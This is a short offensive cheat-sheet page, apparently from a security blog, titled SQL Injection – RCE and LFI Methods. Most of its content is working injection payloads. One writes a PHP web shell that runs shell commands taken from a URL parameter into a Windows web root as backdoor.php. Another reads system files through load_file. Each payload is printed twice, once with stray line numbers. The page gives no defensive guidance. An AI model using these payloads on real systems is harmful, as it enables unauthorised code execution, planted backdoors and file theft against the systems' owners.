SQL Injection – RCE and LFI Methods

Upload PHP Command Injection

Following can be used to get RCE / Command Execution when target is vulnerable to SQLi.

union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'

1 2	union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'

Load File via SQLi

Following can be used to read files from target.

union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

1 2	union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

SQL Injection – RCE and LFI Methods

Tagged on: LFI RCE sqli